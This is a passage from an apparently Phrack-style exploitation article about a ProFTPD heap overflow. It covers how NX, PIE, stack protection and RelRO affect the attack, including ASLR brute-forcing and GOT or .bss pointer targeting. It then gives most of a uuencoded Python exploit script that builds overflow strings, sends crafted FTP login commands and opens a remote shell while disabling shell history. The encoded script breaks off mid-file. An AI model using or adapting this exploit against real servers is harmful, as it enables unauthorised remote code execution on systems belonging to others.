be in luck.

------[ 5.2 - Non-executable Memory ] 

With kernels using PAE and hardware supported NX-bit will break our 
shellcode approach, however, it will not affect our approach used in 
"Cleanup structure crash".

With kernels that use CS limit to approximate non executable memory, it may
be possible that a higher region of memory is marked executable, and thus 
our shellcode region is executable. The metasploit stager shellcode reads
onto the stack and jumps to it, so cs limit approximation would block that
attempt. A suitable mprotect() call could fix it though.

It may be possible use the overflow to make ProFTPD think we have been 
authenticated, without requiring any shellcode. Assuming the pool memory 
layout is not irreparably harmed, we may be able to do some interesting 
things.

------[ 5.3 - Position Independent Executable Binaries ]

In case of PIE, it would be feasible to brute force the randomisation as
ProFTPD fork()s for each client connection. In order to make the most of
ASLR, ProFTPD would have to fork+execve() itself, or be configured to use
xinetd/inetd (which would probably be a significant performance problem on 
busy sites). Using fork+execve() would be the best approach as it would 
require least changes by the user except an update to ProFTPD.

The avenue we are using for exploitation does not lend itself to off-by-X 
overwrites, as our contents is appended by ')\x00, which restricts the 
characters we can use dramatically. 

As for information leaks, I have seen heap address info leaks when the 
server replies with "Password needed for <OUR CONTENT><MANGLED HEAP 
ADDRESS>". This may be useful at some stage if a different avenue is needed
for exploitation.

Unfortunately, ProFTPD frequently uses pcalloc() which reduces the 
potential for info leaks in some other cases.

------[ 5.4 - Stack Protector ] 

SSP does not play much of a part as we are not overwriting the stack, and 
nor are we abusing a libc function to overwrite contents (due to recent 
instrumentation added to gcc/glibc/so on). So far, targeting the stack 
seems irrelevant, and due to ASLR being in modern kernels, not that useful.

------[ 5.5 - RelRO ]

If readonly relocations is enabled on the target binary, (and being 
enforced/enabled properly) it will break our current avenue of overwriting
the GOT table to gain control of execution. 

However, it may be possible to target .bss heap pointers in ProFTPD that 
get called. (objdump -tr /usr/local/sbin/proftpd | grep bss | grep 0004 or 
so should find potential function pointers :p)

Assuming non-executable memory is not in use, the BSS provides a suitable
location to store our shellcode, due to the proctitle.c code.

--[ 6 - References

[1]  http://www.proftpd.org
[2]  http://labix.org/python-constraint
[3]  http://bitbucket.org/haypo/python-ptrace/
[4]  http://pyevolve.sourceforge.net/
[5]  http://www.castaglia.org/proftpd/doc/devel-guide/introduction.html
[6]  http://www.phreedom.org/solar/exploits/proftpd-ascii/
[7]  ga_exp_find.py in the attached code.. my bash history says I used
     it with python ga_exp_find.py -o 32 -i 127.0.0.1 -U -s f .. for 
     what it's worth :p
[8]  http://dev.mysql.com/doc/refman/5.0/en/string-syntax.html
[9]  code/final_exploit/exploit.py
[10] code/final_exploit/exploitsc.py
[11] http://felinemenace.org/~andrewg/Timing_attacks_and_heap_exploitation/


begin 644 proftpd.py
M"FEM<&]R="!O<PII;7!O<G0@<WES"FEM<&]R="!R90II;7!O<G0@<VEG;F%L
M"FEM<&]R="!S=')U8W0*:6UP;W)T('-O8VME=`II;7!O<G0@=&EM90IF<F]M
M(&]P='!A<G-E(&EM<&]R="!/<'1I;VY087)S97(L($]P=&EO;D=R;W5P"FEM
M<&]R="!H87-H;&EB"FEM<&]R="!R86YD;VT*:6UP;W)T('1E;&YE=&QI8@II
M;7!O<G0@<F4@"@II;7!O<G0@<&EC:VQE"FEM<&]R="!S96QE8W0*"FEM<&]R
M="!C;W!Y"@IS<VQ?879A:6QA8FQE(#T@1F%L<V4*"G1R>3H*"6EM<&]R="!S
M<VP*"7-S;%]A=F%I;&%B;&4@/2!4<G5E"F5X8V5P="!);7!O<G1%<G)O<BP@
M93H*"7!A<W,*"@IC;&%S<R!5<V5R4W1R:6YG.@H))R<G"@E5<V5R4W1R:6YG
M(&ES(&%N(&%B<W1R86-T:6]N('5S960@=&\@<F5F;&5C="!T:&4@9V5N97)A
M=&5D('-T<FEN9R!F;W(@=&AE(%5315(*"6-O;6UA;F0N"@H))R<G"@H)<F5P
M971I=&EO;G,@/2`P"0D)"2,@2&]W(&UA;GD@)6TG<S\*"6-H87)S(#T@,"`)
M"0D)(R!(;W<@;6%N>2!!)W,_"@EP97)C96YT7U1S(#T@,`D)"0DC($AO=R!M
M86YY("54)W,_"@EP97)C96YT7V9S(#T@,`D)"0DC($AO=R!M86YY("5F)W,_
M"@EP97)C96YT7VQS(#T@,`D)"0DC($AO=R!M86YY("5L)W,_"@EO=F5R9FQO
M=U]S:7IE(#T@,`D)"2,@2&]W(&UU8V@@87)E('=E('1R>6EN9R!T;R!O=F5R
M9FQO=R!B>3\*"6-O;'5M;E]L96X@/2`P"0D)"2,@5VAA="!I<R!T:&4@;&5N
M9W1H(&]F('1H92!C;VQU;6Y?;F%M93\*"B`@("`@("`@=6YK;F]W;E]T86=?
M;&5N9W1H(#T@;&5N*"=[54Y+3D]73B!404=])RD*("`@("`@("!I9&5N=%]T
M86=?;&5N9W1H(#T@;&5N*"=53DM.3U=.)RD*"@H)9&5F(%]?:6YI=%]?*'-E
M;&8L(&-H<F]M;W-O;64L(&]V97)F;&]W7W-I>F4L(&-O;'5M;E]L96XI.@H)
M"7-E;&8N8VAR;VUO<V]M92`](&-H<F]M;W-O;64*"@D)<V5L9BYO=F5R9FQO
M=U]S:7IE(#T@;W9E<F9L;W=?<VEZ90H)"7-E;&8N8V]L=6UN7VQE;B`](&-O
M;'5M;E]L96X*"@D)<V5L9BYR97!E=&ET:6]N<R`](&-H<F]M;W-O;64N8V]U
M;G0H(B5M(BD*"0ES96QF+F-H87)S(#T@8VAR;VUO<V]M92YC;W5N="@B02(I
M"@D)<V5L9BYP97)C96YT7U1S(#T@8VAR;VUO<V]M92YC;W5N="@B)50B*0H)
M"7-E;&8N<&5R8V5N=%]F<R`](&-H<F]M;W-O;64N8V]U;G0H(B5F(BD*"0ES
M96QF+G!E<F-E;G1?;',@/2!C:')O;6]S;VUE+F-O=6YT*"(E;"(I"@D)<V5L
M9BYP97)C96YT7UIS(#T@8VAR;VUO<V]M92YC;W5N="@B)5HB*0H*"0ES96QF
M+FQE;F=T:"`]('-E;&8N;&5N*"D*"0ES96QF+F-H<F]M;W-O;64N<&]P*"D*
M"@ED968@;&5N*'-E;&8I.@H)"2<G)PH)"6QE;B@I(&-A;&-U;&%T97,@:&]W
M(&UU8V@@<W!A8V4@=&AE(&=I=F5N('-T<FEN9R!W:6QL(&5X<&%N9"!T;R!D
M=64@=&\@=&%G('!A<W-I;F<N"@D))R<G"@H)"2-A<W-E<G0H<V5L9BYC;VQU
M;6Y?;&5N("$](#`I"@H)"6QI;F5?;&5N9W1H(#T@;&5N*"(B+FIO:6XH<V5L
M9BYC:')O;6]S;VUE*2D*"0D*"0DC("@@*R!C;VQU;6Y?;&5N("L@/2<*"0ER
M970@/2`Q("L@<V5L9BYC;VQU;6Y?;&5N("L@,@H)"7)E="`K/2`H<V5L9BYR
M97!E=&ET:6]N<R`J(&QI;F5?;&5N9W1H*0H)"7)E="`K/2!S96QF+F-H87)S
M"@D)<F5T("L]('-E;&8N;W9E<F9L;W=?<VEZ90H)"7)E="`K/2`H<V5L9BYU
M;FMN;W=N7W1A9U]L96YG=&@@*B!S96QF+G!E<F-E;G1?6G,I"2,@>U5.2TY/
M5TX@5$%'?0H)"7)E="`K/2!S96QF+G!E<F-E;G1?9G,)"0D)"2,@+0H)"7)E
M="`K/2`H<V5L9BYP97)C96YT7U1S("H@,RD)"0D)(R`P+C`*"0ER970@*ST@
M*'-E;&8N:61E;G1?=&%G7VQE;F=T:"`J('-E;&8N<&5R8V5N=%]L<RD)"2,@
M54Y+3D]73@H)"7)E="`K/2`R("`C("<I(`H)"@D)<F5T=7)N(')E=`H*"61E
M9B!?7W-T<E]?*'-E;&8I.@H)"7)E='5R;B`B(BYJ;VEN*'-E;&8N8VAR;VUO
M<V]M92D*"F-L87-S(%-I;&QY4W1R=6-T.@H)<&%R86US(#T@6UT*"@ED968@
M7U]I;FET7U\H<V5L9BP@*F%R9W,I.@H)"6%S<V5R="AL96XH<V5L9BYP87)A
M;7,I("$](#`I"@H)"6EF*&QE;BAA<F=S*2DZ"@D)"6%S<V5R="AL96XH87)G
M<RD@/3T@;&5N*'-E;&8N<&%R86US*2D*"@D)"7!A<F%M<R`](&-O<'DN8V]P
M>2AS96QF+G!A<F%M<RD*"@D)"69O<B!A<F<@:6X@87)G<SH*"0D)"7-E=&%T
M='(H<V5L9BP@<&%R86US+G!O<"@P*2P@87)G*0H*"61E9B!?7W-T<E]?*'-E
M;&8I.@H)"7)E="`](%M="@H)"2,@8V%N('!R;V)A8FQY("),(B`J(&%M="P@
M*G-E;&8N<&%R86US(&ET+@H*"0EF;W(@<&%R86T@:6X@<V5L9BYP87)A;7,Z
M"@D)"2-P<FEN="!P87)A;0H)"0DC<')I;G0@9V5T871T<BAS96QF+"!P87)A
M;2D*"0D)<F5T+F%P<&5N9"AS=')U8W0N<&%C:R@B/$PB+"!G971A='1R*'-E
M;&8L('!A<F%M*2DI"@H)"7)E='5R;B`B(BYJ;VEN*')E="D*"@ED968@7U]L
M96Y?7RAS96QF*3H*"0ER971U<FX@;&5N*'-E;&8N<&%R86US*2`J(#0*"F-L
M87-S(%!O;VQ";&]K*%-I;&QY4W1R=6-T*3H*"2,@("`O*B!!8W1U86P@:&5A
M9&5R("HO"@DC("!S=')U8W0@>PH)(R`@("!C:&%R("IE;F1P.PH)(R`@("!U
M;FEO;B!B;&]C:U]H9'(@*FYE>'0["@DC("`@(&-H87(@*F9I<G-T7V%V86EL
M.PH)(R`@?2!H.PH)(R`K('!A9&1I;F<@8W)A<"`Z?`H)(R!T;W1A;"!O9B`R
M-"!B>71E<RX*"@EE;F1P(`D)/2`P>#0Q-#$T,30Q"@EN97AT(`D)/2`P>#0R
M-#(T,C0R"@EF:7)S=%]A=F%I;`D](#!X-#,T,S0S-#,*"7!A9%\Q"0D](#!X
M-#`T,#0P-#`*"@EP87)A;7,@/2!;(")E;F1P(BP@(FYE>'0B+"`B9FER<W1?
M879A:6PB+"`B<&%D7S$B(%T*"F-L87-S(%!O;VQ(96%D97(H4VEL;'E3=')U
M8W0I.@H)(R!S=')U8W0@<&]O;"!["@DC("!U;FEO;B!B;&]C:U]H9'(@*F9I
M<G-T.PH)(R`@=6YI;VX@8FQO8VM?:&1R("IL87-T.PH)(R`@<W1R=6-T(&-L
M96%N=7`@*F-L96%N=7!S.PH)(R`@<W1R=6-T('!O;VP@*G-U8E]P;V]L<SL*
M"2,@('-T<G5C="!P;V]L("IS=6)?;F5X=#L*"2,@('-T<G5C="!P;V]L("IS
M=6)?<')E=CL*"2,@('-T<G5C="!P;V]L("IP87)E;G0["@DC("!C:&%R("IF
M<F5E7V9I<G-T7V%V86EL.PH)(R`@8V]N<W0@8VAA<B`J=&%G.PH)(R!].PH*
M"69I<G-T(`D)"3T@,'@S,#,P,S`S,`H);&%S="`)"0D](#!X,S$S,3,Q,S$*
M"6-L96%N=7!S(`D)/2`P>#,R,S(S,C,R"@ES=6)?<&]O;',)(`D](#!X,S,S
M,S,S,S,*"7-U8E]N97AT(`D)/2`P>#,T,S0S-#,T"@ES=6)?<')E=@D)/2`P
M>#,U,S4S-3,U"@EP87)E;G0)"0D](#!X,S8S-C,V,S8*"69R965?9FER<W1?
M879A:6P)/2`P>#,W,S<S-S,W"@ET86<)"0D](#!X,S@S.#,X,S@*"@DC("<I
M7'@P,"!F;W(@=&%G(`H)<&%R86US(#T@6R`B9FER<W0B+"`B;&%S="(L(")C
M;&5A;G5P<R(L(")S=6)?<&]O;',B+"`B<W5B7VYE>'0B+"`B<W5B7W!R978B
M+"`B<&%R96YT(BP@(F9R965?9FER<W1?879A:6PB("!="@IC;&%S<R!0;V]L
M0VQE86YU<"A3:6QL>5-T<G5C="DZ"@DC='EP961E9B!S=')U8W0@8VQE86YU
M<"!["@DC("!V;VED("ID871A.PH)(R`@=F]I9"`H*G!L86EN7V-L96%N=7!?
M8V(I*'9O:60@*BD["@DC("!V;VED("@J8VAI;&1?8VQE86YU<%]C8BDH=F]I
M9"`J*3L*"2,@('-T<G5C="!C;&5A;G5P("IN97AT.PH)(WT@8VQE86YU<%]T
M.PH*"61A=&$@/2`P>#4Q-3$U,34Q"@EP;&%I;E]C;&5A;G5P7V-B(#T@,'@U
M,C4R-3(U,@H)8VAI;&1?8VQE86YU<%]C8B`](#!X-3,U,S4S-3,)"@EN97AT
M(#T@,'@U-#4T-30U-`H*"7!A<F%M<R`](%L@(F1A=&$B+"`B<&QA:6Y?8VQE
M86YU<%]C8B(L(")C:&EL9%]C;&5A;G5P7V-B(BP@(FYE>'0B(%T*"@IC;&%S
M<R!0<F]&5%!$7T)A<VEC<SH*"2<G)R`*"4)A<V4@8VQA<W,@9F]R(&]F9G-E
M="!E>'!L;VET871I;VXL(&%N9"!B<G5T969O<F-E(&5X<&QO:71A=&EO;BX*
M"2<G)PH*"75S97)?8V]L=6UN7VQE;F=T:"`](#`*"@DC(%-E;&8M9&]C=6UE
M;G1I;F<@8V]D92`Z*0H)=7-E<E]C;VQU;6Y?;&5N9W1H<R`](%L@;&5N*")U
M<V5R:60B*2P@;&5N*")U<V5R;F%M92(I(%T@"@H);7-F7W!A='1E<FX@/2`H
M"@D))T%A,$%A,4%A,D%A,T%A-$%A-4%A-D%A-T%A.$%A.4%B,$%B,4%B,D%B
M,T%B-$%B-2<*"0DG06(V06(W06(X06(Y06,P06,Q06,R06,S06,T06,U06,V
M06,W06,X06,Y060P060Q)PH)"2=!9#)!9#-!9#1!9#5!9#9!9#=!9#A!9#E!
M93!!93%!93)!93-!931!935!939!93<G"@D))T%E.$%E.4%F,$%F,4%F,D%F
M,T%F-$%F-4%F-D%F-T%F.$%F.4%G,$%G,4%G,D%G,R<*"0DG06<T06<U06<V
M06<W06<X06<Y06@P06@Q06@R06@S06@T06@U06@V06@W06@X06@Y)PH)"2=!
M:3!!:3%!:3)!:3-!:31!)PH)*0H*"6)A9&-H87)S(#T@<V5T*")<>#`P7'@P
M85QX,&1<>#%A7'@R,EQX,C5<>#(W7'@U8UQX-69<>&9F(BD*"7-K="`]($YO
M;F4*"@EC86-H92`]($YO;F4*"@ED968@7U]I;FET7U\H<V5L9BP@:&]S="P@
M;W!T:6]N<RDZ"@D)<V5L9BYH;W-T(#T@:&]S=`H)"7-E;&8N;W!T:6]N<R`]
M(&]P=&EO;G,*"@D)(W!R:6YT(&]P=&EO;G,*"@D):68H;W!T:6]N<RYU<V5R
M7V-O;'5M;E]L96YG=&@I.@H)"0ES96QF+G5S97)?8V]L=6UN7VQE;F=T:',@
M/2!;(&]P=&EO;G,N=7-E<E]C;VQU;6Y?;&5N9W1H(%T*"0D*"@ED968@<V5T
M7W5S97)?8V]L=6UN*'-E;&8L(&YA;64I.@H)"7-E;&8N=7-E<E]C;VQU;6Y?
M;&5N9W1H(#T@;&5N*&YA;64I"@H)9&5F(&UA:V5?=7-E<E]S=')I;F<H<V5L
M9BP@;W9E<F9L;W=?86UO=6YT+"!C;VQU;6Y?;&5N9W1H+"!P861D:6YG/3`I
M.@H)"2<G)PH)"6UA:V4@<F5T=7)N<R!A(%5S97)3=')I;F<@8VQA<W,@:6YI
M=&EA;&EZ960@=VET:"!P87)A;65T97)S(&%B;W9E+@H)"0H)"6]V97)F;&]W
M7V%M;W5N="!I;F1I8V%T97,@:&]W(&UU8V@L(&EF(&%N>2P@=&AE('1A<F=E
M="!B=69F97(@<VAO=6QD(&)E"@D);W9E<G=R:71T96X@8GDN($EF(&ET(&ES
M(#`L(&ET('=I;&P@<F5T=7)N(&$@<W1R:6YG('1H870@=7-E<PH)"6)E='=E
M96X@,3`R-"!A;F0@-#`X,"!B>71E<RX*"0DG)R<*"@H)"71A9W,@/2!;("(E
M;2(L("(E;"(L("(E9B(L("(E6B(L("(E5"(L(")!(B!="@D)=&%G7VQE;B`]
M(&QE;BAT86=S*0D)"@H)"69O=6YD(#T@1F%L<V4*"0EA='1E;7!T<R`](#`@
M"@H)"7=H:6QE(&YO="!F;W5N9#H*"0D)871T96UP=',@*ST@,0H)"0EC:')O
M;6]S;VUE(#T@6UT*"0D)"@D)"6ET96US(#T@<F%N9&]M+G)A;F1I;G0H,"P@
M,3`P*0H)"0EW:&EL92!I=&5M<SH*"0D)"6-H<F]M;W-O;64N87!P96YD*'1A
M9W-;<F%N9&]M+G)A;F1I;G0H,"P@=&%G7VQE;BTQ*5TI"@D)"0EI=&5M<R`M
M/2`Q"B`*"0D)(R!0<F]B86)L>2!U;BUN965D960L(&%S(#$P,"`J(#(@/"`R
M-38N($)U="!)(&UI9VAT(&1E8VED92!T;R!C:&%N9V4*"0D)(R!S;VUE=&AI
M;F<@;&%T97(@;VXL(&%N9"!T:&ES('=O=6QD('-E<G9E(&%S(&$@<W5I=&%B
M;&4@<F5M:6YD960*"0D)87-S97)T*&QE;B@B(BYJ;VEN*&-H<F]M;W-O;64I
M*2`\(#(U-BD*"@D)"6EF*&]V97)F;&]W7V%M;W5N="`]/2`P*3H*"0D)"6-H
M<F]M;W-O;64N87!P96YD*'-E;&8N;7-F7W!A='1E<FY;.G!A9&1I;F==*0H*
M"0D)"75S(#T@57-E<E-T<FEN9RAC:')O;6]S;VUE+"!O=F5R9FQO=U]A;6]U
M;G0L(&-O;'5M;E]L96YG=&@I"@D)"0EI9BAU<RYL96YG=&@@/CT@,C`T."!A
M;F0@=7,N;&5N9W1H(#P](#0P.#`I.@H)"0D)"69O=6YD(#T@5')U90H)"0D*
M"0D)96QS93H*"0D)"6-H<F]M;W-O;64N87!P96YD*'-E;&8N;7-F7W!A='1E
M<FY;.F]V97)F;&]W7V%M;W5N=%TI"@D)"0D*"0D)"75S(#T@57-E<E-T<FEN
M9RAC:')O;6]S;VUE+"!O=F5R9FQO=U]A;6]U;G0L(&-O;'5M;E]L96YG=&@I
M"@D)"0EI9BAU<RYL96YG=&@@/3T@-#`Y-B`K(&]V97)F;&]W7V%M;W5N="`K
M(#(I.@H)"0D)"69O=6YD(#T@5')U90H*"0DC<')I;G0@(D9O=6YD(&EN("5D
M(&%T=&5M<'1S(B`E(&%T=&5M<'1S"@D)(W!R:6YT('5S+F-H<F]M;W-O;64*
M"@D)<F5T=7)N('5S"@H)9&5F(&-O;FYE8W0H<V5L9BDZ"@D))R<G"@D)8V]N
M;F5C="!T;R!T:&4@<F5M;W1E(&AO<W0L(&%N9"!H86YD;&4@4U-,('-U<'!O
M<G0@:68@<F5Q=65S=&5D+@H)"2<G)PH*"0EI9BAS96QF+G-K="DZ"@D)"71R
M>3H*"0D)"7-E;&8N<VMT+G-E;F0H(E%5251<<EQN(BD*"0D)97AC97!T.@H)
M"0D)<&%S<PH*"0D)<V5L9BYS:W0N8VQO<V4H*0H*"0ES:W0@/2!S;V-K970N
M<V]C:V5T*"D*"0ET<GDZ"@D)"7-K="YC;VYN96-T*"AS96QF+FAO<W0L('-E
M;&8N;W!T:6]N<RYP;W)T*2D*"0EE>&-E<'0@<V]C:V5T+F5R<F]R+"!E.@H)
M"0EP<FEN="`B56YA8FQE('1O(&-O;FYE8W0@=&\@<F5M;W1E(&AO<W0@*"5S
M*2(@)2!E+FUE<W-A9V4*"0D)<WES+F5X:70H,2D*"@D)8F%N;F5R(#T@<VMT
M+G)E8W8H,3`P*2YS=')I<"@I"@H)"6EF*&YO="!B86YN97(I.@H)"0ES:W0N
M8VQO<V4H*0H)"0ER971U<FX@1F%L<V4*"@D)<')I;G0@(ELK72!#;VYN96-T
M960L(')E8VEE=F5D(%LE<UT@87,@=&AE(&)A;FYE<B(@)2!B86YN97(*"@D)
M:68H;F]T('-E;&8N;W!T:6]N<RYS<VPI.@H)"0ES96QF+G-K="`]('-K=`H)
M"0ER971U<FX@5')U90H*"0DC(%=R87`@<V]C:V5T"@H)"7-K="YS96YD*")!
M551((%1,4UQR7&XB*0H)"7)E<W`@/2!S:W0N<F5C=B@U,#`I+G-T<FEP*"D*
M"0EI9BAR97-P6SHS72`A/2`B,C,T(BDZ"@D)"7!R:6YT(")$:60@;F]T(&=E
M="!/2R!S=&%T=7,@9F]R($%55$@@5$Q3(@H)"0EP<FEN="`B1V]T(%LE<UT@
M:6YS=&5A9"(@)2!R97-P"@D)"7-K="YC;&]S92@I"@D)"7)E='5R;B!&86QS
M90H)"0H)"7-E;&8N<VMT(#T@<W-L+G=R87!?<V]C:V5T*'-K="D*"0ES96QF
M+G-K="YD;U]H86YD<VAA:V4H*0H)"0H)"7)E='5R;B!4<G5E"@H)9&5F(&1O
M7V9A:V5?875T:"AS96QF+"!F86ME875T:'-T<BDZ"@D)<V5L9BYS:W0N<V5T
M=&EM96]U="@Q,"XP*0H*"0EP<FEN="`B6RM=(%-E;F1I;F<@=7-E<B`N+B(L
M"@D)<V5L9BYS:W0N<V5N9"@B55-%4B`E<UQR7&XB("4@9F%K96%U=&AS='(I
M"@D)=')Y.@H)"0ER97-P(#T@<V5L9BYS:W0N<F5C=B@T,#`I+G-T<FEP*"D*
M"0D):68H;F]T(')E<W`I.@H)"0D)<F5T=7)N($9A;'-E"@D)97AC97!T($5X
M8V5P=&EO;BP@93H*"0D)<')I;G0@(G1O;VL@=&]O(&QO;F<L(')E='5R;FEN
M9R`H)7,I(B`E("AE+FUE<W-A9V4I"@D)"7!R:6YT('1Y<&4H92D*"0D)<')I
M;G0@9&ER*&4I"@D)"7)E='5R;B!&86QS90H*"0EP<FEN="`B<F5S<&]N<V4@
M=V%S(%LE<UTB("4@<F4N<W5B*");7F$M>D$M6C`M.2`E+UTB+"`B+B(L(')E
M<W`N<W1R:7`H*2D*"@D)<')I;G0@(ELK72!396YD:6YG('!A<W,@+BXB+`H)
M"0H)"71R>3H*"0D)<V5L9BYS:W0N<V5N9"@B4$%34R!I;G9A;&ED7')<;B(I
M"@D)"7)E<W`@/2!S96QF+G-K="YR96-V*#$P,"DN<W1R:7`H*0H)"0EI9BAN
M;W0@<F5S<"DZ"@D)"0ER971U<FX@1F%L<V4*"0EE>&-E<'0@17AC97!T:6]N
M+"!E.@H)"0EP<FEN="`B=&]O:R!T;V\@;&]N9RP@<F5T=7)N:6YG("@E<RDB
M("4@*&4N;65S<V%G92D*"0D)<')I;G0@='EP92AE*0H)"0EP<FEN="!D:7(H
M92D*"0D)<F5T=7)N($9A;'-E"@H)"7!R:6YT(")R97-P;VYS92!W87,@6R5S
M72(@)2!R97-P"@D)<V5L9BYS:W0N<V5T=&EM96]U="@P*0H)"7)E='5R;B!4
M<G5E"@H)9&5F(&-H96-K7V9O<E]B861?8VAA<G,H<V5L9BP@<W1R:6YG*3H*
M"0DC(#PS('-E="!O<&5R871I;VYS"@D)<F5T=7)N('-E="@I(#T]("AS970H
M<W1R:6YG*2`F('-E;&8N8F%D8VAA<G,I"@H)9&5F('-H96QL7VAA;F1L97(H
M<V5L9BDZ"@D))R<G"@D)<VAE;&Q?:&%N9&QE<B!C:&5C:W,@=&\@<V5E(&EF
M('=E(&AA=F4@82!R96UO=&4@<VAE;&P@;VX@<V]C:V5T+"!A;F0@:68@<V\L
M(`H)"6%L;&]W<R!T:&4@=7-E<B!T;R!I;G1E<F9A8V4@=VET:"!I="X*"0DG
M)R<*"@D)(R!7;W)K(&]U="!W:&%T('-K="!W92!S:&]U;&0@8F4@=7-I;F<*
M"0EI9BAS96QF+F]P=&EO;G,N<W-L*3H*"0D)<VMT(#T@<V5L9BYS:W0N7W-O
M8VL*"0D)<VMT+G-E=&)L;V-K:6YG*#$I"@D)96QS93H*"0D)<VMT(#T@<V5L
M9BYS:W0*"@D)<FQI<W0L('=L:7-T+"!X;&ES="`]('-E;&5C="YS96QE8W0H
M6W-K=%TL(%M=+"!;<VMT72P@,BXP*0H)"6EF*'-K="!I;B!R;&ES="!O<B!S
M:W0@:6X@>&QI<W0I.@H)"0DC(%-O8VME="!I<R!P<F]B86)L>2!C;&]S960N
M"@D)"7)E<W`@/2!S:W0N<F5C=B@U,#`I"@D)"6EF*&YO="!R97-P*3H*"0D)
M"7)E='5R;B!&86QS90H)"0D*"0D):68H*')E<W!;,%T@/3T@(EQX,3<B(&%N
M9"!S96QF+F]P=&EO;G,N<W-L*2!O<B!R97-P6S!=(#T]("(S(BDZ"@D)"0DC
M(%1H:7,@:7,@:6YT97)E<W1I;F<N($DG=F4@;F]T:6-E9"!T:&%T(&EF('=E
M(&=E="!A(')E<W!O;G-E+"!W92=V92!C;W)R=7!T960@=&AE(`H)"0D)(R!H
M96%P(&5N;W5G:"!T:&%T(&]N92!M;W)E(&-O;6UA;F0@<VAO=6QD(&1O('1H
M92!T<FEC:R`[*0H*"0D)"7!R:6YT(");*UT@0VQO<V4N(%1R>6EN9R!T;R!T
M<FEG9V5R('9I82!005-3(&EN=F%L:60B"@D)"0ES96QF+G-K="YS96YD*")0
M05-3(&EN=F%L:61<<EQN(BD*"0D)"71I;64N<VQE97`H,"XU*0H)"0EE;'-E
M.B`*"0D)"7!R:6YT(");*UT@2&TN($=O="!;)7,N+ETL('5N97AP96-T961L
M>2XN('1H:7,@=7-U86QL>2!M96%N<R!W92=R92!C;&]S92!T;R!G971T:6YG
M(&$@<VAE;&P@.RDB("4@<F5S<"YE;F-O9&4H)VAE>"<I6SHQ,ET*"@D)"@H)
M"7!R:6YT("=;*UT@0VAE8VMI;F<@9F]R('-H96QL+BXN)RP*"@D)=')Y.@H)
M"0ES:W0N<V5N9"@B7&Y<;F5C:&\@1$].15QN(BD*"0D)<F5S<"`]('-K="YR
M96-V*#(P*0H*"0D):68H<F5S<"YF:6YD*")$3TY%(BD@/3T@+3$I.@H)"0D)
M<')I;G0@(FYO="!F;W5N9"P@9V]T(%LE<UT@:6YS=&5A9"(@)2`H<F5S<"YS
M=')I<"@I+F5N8V]D92@G:&5X)RDI"@D)"0ER971U<FX@1F%L<V4*"0D)96QS
M93H*"0D)"7!R:6YT("(@87!P96%R<R!W92!H879E(&=O="!A('-H96QL(@H*
M"0EE>&-E<'0@<V]C:V5T+F5R<F]R+"!E.@H)"0EP<FEN="`G0V]N;F5C=&EO
M;B!I;G1E<G)U<'1E9"`H)7(I)R`E(&4*"0D)<F5T=7)N"@H)"0H*"0ES:W0N
M<V5N9"@B=6YS970@2$E35$9)3$5<;B(I"@D)(R!0<F]&5%!$('5S97,@<VEG
M86QR;2!F;W(@<V-H961U;&EN9R!T:&EN9W,*"0ES:W0N<V5N9"@B=')A<"`G
M)R!324=!3%)-7&XB*0H)"2,@4F5D:7)E8W0@<W1D:6X@=&\@<W1D;W5T('-O
M('=E(&-A;B!S964@=VAE;B!W92!M86ME(&-L:2!E<G)O<G,*"0ES:W0N<V5N
M9"@B97AE8R`R/B8Q7&XB*0H*"0DC($-L96%N('5P('-O;64@9FEL92!D97-C
M<FEP=&]R<PH)"69O<B!I(&EN(')A;F=E*#,L(#$P*3H*"0D)<VMT+G-E;F0H
M(F5X96,@)60^)BU<;B(@)2!I*0H*"0EP<FEN="`B6RM=(%-T87)T:6YG('-H
M96QL+B!S:&]U;&0@8F4@86-T:79E(&%N9"!C;&5A;F5D('5P(@H*"0ET(#T@
M=&5L;F5T;&EB+E1E;&YE="@I"@D)="YS;V-K(#T@<VMT"@D)="YI;G1E<F%C
M="@I"@D)"@D)<F5T=7)N(%1R=64*"@ED968@;&]A9%]C86-H92AS96QF+"!T
M87)G970I.@H)"6EF*'-E;&8N;W!T:6]N<RYI9VYO<F5?8V%C:&4I.@H)"0ER
M971U<FX*"@D)=')Y.@H)"0ED871A(#T@;W!E;B@G)7,N8V%C:&4G("4@=&%R
M9V5T6R=T>7!E)UTI+G)E860H*0H)"65X8V5P="!%>&-E<'1I;VXL(&4Z"@D)
M"7!R:6YT("(E<B(@)2!E"@D)"7)E='5R;B!&86QS90H*"0ES96QF+F-A8VAE
M(#T@<&EC:VQE+FQO861S*&1A=&$I"@H)9&5F('-A=F5?8V%C:&4H<V5L9BP@
M=&%R9V5T+"!F86ME+"!T<FEG9V5R*3H*"0EI9BAS96QF+F]P=&EO;G,N:6=N
M;W)E7V-A8VAE*3H*"0D)<F5T=7)N"@H)"6EF*&YO="!S96QF+F-A8VAE*3H*
M"0D)<V5L9BYC86-H92`]('M]"@D)"@D):68H;F]T('-E;&8N8V%C:&4N:&%S
M7VME>2AT87)G971;)VYA;64G72DI.@H)"0ES96QF+F-A8VAE6W1A<F=E=%LG
M;F%M92==72`](%M="@H)"7-E;&8N8V%C:&5;=&%R9V5T6R=N86UE)UU=+F%P
M<&5N9"@H9F%K92P@=')I9V=E<BDI"@H)"61A=&$@/2!P:6-K;&4N9'5M<',H
M<V5L9BYC86-H92D*"@D)(W1R>3H*"0EF<"`](&]P96XH)R5S+F-A8VAE)R`E
M('1A<F=E=%LG='EP92==+"`G=RLG*0H)"69P+G=R:71E*&1A=&$I"@D)9G`N
M8VQO<V4H*0H)"2-E>&-E<'0@17AC97!T:6]N+"!E.@H)"2,)<F%I<V4*"@IC
M;&%S<R!0<F]&5%!$7T]F9G-E=',H4')O1E101%]"87-I8W,I.@H)9&5F('1E
M<W1?8V%C:&4H<V5L9BP@=&%R9V5T*3H*"0ES96QF+FQO861?8V%C:&4H=&%R
M9V5T*0H*"0EI9BAS96QF+F-A8VAE(&%N9"!S96QF+F-A8VAE+FAA<U]K97DH
M=&%R9V5T6R=N86UE)UTI*3H*"0D)<')I;G0@(ELK72!4<GEI;F<@)60@8V%C
M:&5D('1R:6=G97(@:6YF;W)M871I;VX@9F]R("5S(B`E("AL96XH<V5L9BYC
M86-H95MT87)G971;)VYA;64G75TI+"!T87)G971;)VYA;64G72D*"@D)"69O
M<B!F86ME+"!T<FEG9V5R(&EN('-E;&8N8V%C:&5;=&%R9V5T6R=N86UE)UU=
M.@H)"0D)<V5L9BYC;VYN96-T*"D*"0D)"6EF*&YO="!S96QF+F1O7V9A:V5?
M875T:"AF86ME*2DZ"@D)"0D)<')I;G0@(ELK72!3;&5E<&EN9R!D=64@=&\@
